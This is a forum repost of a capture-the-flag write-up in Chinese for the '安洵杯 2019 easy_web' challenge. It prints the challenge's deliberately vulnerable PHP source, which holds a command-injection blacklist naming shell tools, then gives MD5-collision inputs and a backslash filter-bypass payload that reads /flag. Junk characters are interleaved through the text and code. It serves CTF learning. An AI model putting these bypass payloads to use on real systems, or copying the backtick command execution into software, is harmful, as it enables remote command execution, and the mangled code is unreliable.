飞雪团队

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 14925|回复: 0

[安洵杯 2019]easy_web

[复制链接]

8242

主题

8330

帖子

2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
27056
发表于 2022-2-12 14:35:42 | 显示全部楼层 |阅读模式
- D$ H& z, U7 b$ t4 w$ S. h! S1 z
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
) l- a( E+ d) G4 G<p>&nbsp;</p>
3 T! J* T2 p/ \) ?4 h8 H' f" p<p>&nbsp;</p>
) D6 U+ B* `8 X, {" T9 D<p>&nbsp;题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=,同时查看源代码</p>: E& e' I  s+ A! [6 ?
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
& t2 i( V7 T* I, l4 z: E6 _, J. ^' A<p>&nbsp;</p>
  m: I+ j" m9 d7 T1 p: S<p>&nbsp;</p>
# R( v$ Z" t/ e<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>: D# e0 g, C1 b# H0 `  I
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>
. j+ f; @4 e) i0 b* H<p>首先把那个进行一次base64位解码</p>
! I; T% U/ J  {$ C% B1 n<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>: r. m) _. C& r* u- k
<p>&nbsp;</p>
7 \% O& V: H) N0 |; B<p>&nbsp;</p>
' N$ d8 D6 I/ n" R3 K9 K<p>&nbsp;解码一次以后还是很像base64编码,于是又解码一次</p>
8 x* E& z$ V1 F5 j- V# {<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>! C  v3 X7 O9 u/ i0 ]
<p>&nbsp;</p>
: ?  T" Q) ~$ l<p>&nbsp;</p>. D  T1 y0 |) v( F5 L
<p>&nbsp;然后用hex解码一下得到了</p>( Y8 c9 S: M  |+ X- ~0 h
<div class="cnblogs_Highlighter">* b# E% Q+ u( Y
<pre class="brush:sql;gutter:true;">555.png
& i) ~% |6 d* O3 C</pre>6 f& b- H0 ]0 m2 b, x
</div>+ J) Y) v6 K7 i# O" m' \
<p>  用同样的方法把index.php进行加密</p>
* \+ C- I: }* P9 T<div class="cnblogs_Highlighter">/ z+ E: V8 S, Y( G# E  D
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
! W3 B  H( C, r' O* z4 E</pre>" U5 t4 d$ V9 `3 s
</div>
5 ~, R' Z& [0 Y; f: I: Q6 D& K% T<p>  然后输入到地址栏</p>. ]+ a) H0 y8 \; y' q
<p>&nbsp;然后查看源代码,把源代码里面的那一串base64的编码解码</p>" N4 A. F& r: p! U5 v
<div class="cnblogs_code">2 n5 X. J7 c4 h% K+ q$ B$ Q
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php1 ]. p" l: l9 d% R+ W
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);" G$ b2 C' V$ v- N, ^5 }. S( o
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
; [  j# F* p& p% S" N/ V$ P/ N* b/ v</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];; S& L$ h; v/ ]7 q5 l. N$ T! A
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) 2 V! w8 c' P' a7 S
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
2 k- ?8 A& y$ Z5 w$ |5 E0 K</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
& b$ ~" u4 z4 v* Y1 S
# a& u' l6 B, u+ g6 ]) J, S</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);( N5 Y1 j4 t' \( a& E
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
# `% C- Q' `; ^* B& @    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;& \( @+ h' ]4 r' ?5 j
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
. B# G& O3 t8 P* \} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
. u- a; `( e8 e    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));7 ]7 j4 v; w5 o6 E( U) q
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;! R8 l, J) N! r* E' ?. @. ]
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
/ @: P/ J( f5 y. L3 R2 Q}
4 x$ |/ R5 T5 \# a7 I</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
5 u9 S- {- E! O3 T</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
# r1 `0 t: S1 s</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {: H4 D) p9 T1 L" o1 i
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
+ F/ S+ ^8 w* m    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
2 V9 ?6 Y  x4 K6 u+ T/ M} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
. }+ k6 w7 }" Q/ a  V  [! R: P- E    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
7 [' m- E$ \; w3 D5 ]# d        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
! A3 R$ a$ Z$ Y& j$ I    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {6 u. i  [# l" p! [2 q1 V0 R$ X; }
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);& Y2 ^& }% ?' t+ T
    }; ]- q1 N3 A  w( U  L
}9 T% y- u2 |! o9 k( v

) q  E# w; L) Q; `0 N4 J" D$ ?* Z  z</span>?&gt;4 i! i8 W+ _! d0 a% j9 d; g
&lt;html&gt;
0 ^. X- Z; f# t- Y7 E&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
( a# ?8 b1 X! b7 m( H/ G4 u  body{
5 r( T$ }: }7 V8 `  c) G7 `$ q; M: q   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;  Y+ R$ }% i- P
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;& `3 I9 z( b5 H- ?5 g3 z  w2 L; q3 ^
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
  I& y0 j+ V- a. l   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
, j/ H; C: j( C/ S- J% V( x4 c<span style="color: rgba(0, 0, 0, 1)">}  f$ ^4 p' x5 l$ C" ^+ ?
</span>&lt;/style&gt;
' j7 k6 v) A" l  |&lt;body&gt;* f" }6 W* f5 `6 T7 t) j5 l5 z
&lt;/body&gt;
4 T" L  e) C" T; v0 o0 y# J8 A4 X&lt;/html&gt;</pre>. U+ z5 V6 A% \- S5 v* i
</div>
( C& c' D, E' p: @( r6 R) u+ y<p>结合前面的推断,关键代码就在</p>8 X! D9 S, o! z  q; z" o% A! u
<div class="cnblogs_code">* j" d$ ]" J: \& J+ u
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {: h$ C8 o# b& ^$ W7 `6 E& Q1 b
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
- A2 }" H" D! E& M3 o) X& Z5 w1 D  ?    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {' R4 v. Z% K  K: y' J
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
/ k* K: C8 M, o4 f6 E    }</span></pre>
( N- o& H/ M* @+ ~1 R+ S. q  g3 A</div>
! S% G" y- g6 |! ?/ \6 E" Y- V" I: v<p>这种MD5是md5强碰撞</p>. F$ h: e9 a$ [  d' I" }1 k
<div class="cnblogs_Highlighter">
4 y1 p+ Q+ D) J1 O<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a21 R2 U( V5 W; E+ X9 w+ m, e6 {* v
</pre>
9 {. N+ j) J' R  \; ^, P" s- p</div>$ D( h' K% g1 L; H$ ]5 Q7 S
<div class="cnblogs_Highlighter">. r# ~8 o1 S, Z9 K1 h5 z
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
' ?; p* @3 X4 s, j: j: [</pre>
# N& j' j* {4 B$ Z</div>
: t+ M+ T3 M( \8 i<p>  只需要这样就可以把cmd里面的当成命令来处理。</p>( ^% L# M) @% i7 ?' Q( F; }0 G
<p>于是采用payload:</p>1 @" @. D* R( S2 b/ E
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>2 Z, n* y+ k! U4 h3 e) N7 D
<p>&nbsp;</p>
3 {" Z1 u( ~( O. n<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>+ b, S7 G/ n9 q. w  j( Q6 q. [9 a
<p>ls和l\s在命令执行的时候结果是一样的。</p>
+ W8 |) v# w7 A. n- F9 e, {; ?" k<p>然后发现根目录里面有/flag</p>! M* y  j* b3 {" h
<p>于是payload:</p>
7 ]2 v( i4 x7 H; T3 H+ o8 ?<div class="cnblogs_Highlighter">
/ o/ o7 }* l' n  E3 E$ [' u5 H( C0 j4 u<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
$ I# W, N' q8 }3 [+ C</pre>
* f7 o0 k6 {7 Y( r</div>
3 d. r& j% ?( ?: c/ x8 }  y7 z<p>  对于这个题目,因为他没有屏蔽sort和dir</p>3 E9 |, \! Y2 }; z
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
0 Z8 ~# r. z0 p# ]" R( t<p>&nbsp;</p>
& E1 U0 P  Q  n: Q
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|飞雪团队

GMT+8, 2026-2-26 22:46 , Processed in 0.446531 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表